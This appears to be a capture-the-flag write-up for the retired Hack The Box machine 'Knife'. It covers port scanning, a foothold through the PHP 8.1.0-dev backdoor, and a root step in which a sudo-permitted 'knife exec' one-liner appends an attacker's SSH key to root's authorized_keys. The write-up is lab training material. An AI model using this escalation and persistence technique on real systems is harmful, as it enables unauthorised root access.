On this post
- Information Gathering
- Privilege Escalation
Knife is a retired vulnerable VM from Hack The Box.
Let’s start with a masscan probe to establish the open ports on the host.

```
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.242 --rate=500

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-05-24 00:49:40 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.242
Discovered open port 22/tcp on 10.10.10.242
```
Nothing unusual stood out. Let’s do one better with nmap, scanning the discovered ports to establish their services.

```
nmap -n -v -Pn -p22,80 -A --reason 10.10.10.242 -oN nmap.txt
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
```
Hmm. I guess the path to foothold is through the http service. This is what it looks like.

This is a shit-show, man. There is nothing on the page: no hyperlinks, no forms, nothing.
PHP 8.1.0-dev Backdoor Remote Command Execution
It was only when I noticed the PHP version the server advertised that I realized I was looking at a PHP backdoor.
According to this repo,

> An early release of PHP, the PHP 8.1.0-dev version, was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the
Armed with this insight, it’s not very difficult to get a proper shell.
user.txt is in james’ home directory.

During enumeration of james’ account, I notice that james is able to sudo the following commands.
Check this out.

> The knife exec subcommand executes Ruby scripts in the context of a fully configured Chef Infra Client. Use this subcommand to run scripts that will only access Chef Infra Server one time (or otherwise very infrequently) or any time that an operation does not warrant full usage of the knife subcommand library.
Since knife exec runs arbitrary Ruby as root under sudo, I’d simply write an SSH public key I control to /root/.ssh/authorized_keys and call it a day.

```sh
sudo knife exec -E 'File.write("/root/.ssh/authorized_keys", "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPEyLBRKTB13FoHcIAf4DKPh9aE8NOsYN+WTXcIreESy\n", mode: "a")'
```

Mode "a" appends rather than overwriting, so any existing keys survive; if the existing file happened to lack a trailing newline, prefixing the key string with "\n" keeps it from being glued onto the previous entry. After that, ssh -i with the matching private key logs in as root, and root.txt is in /root.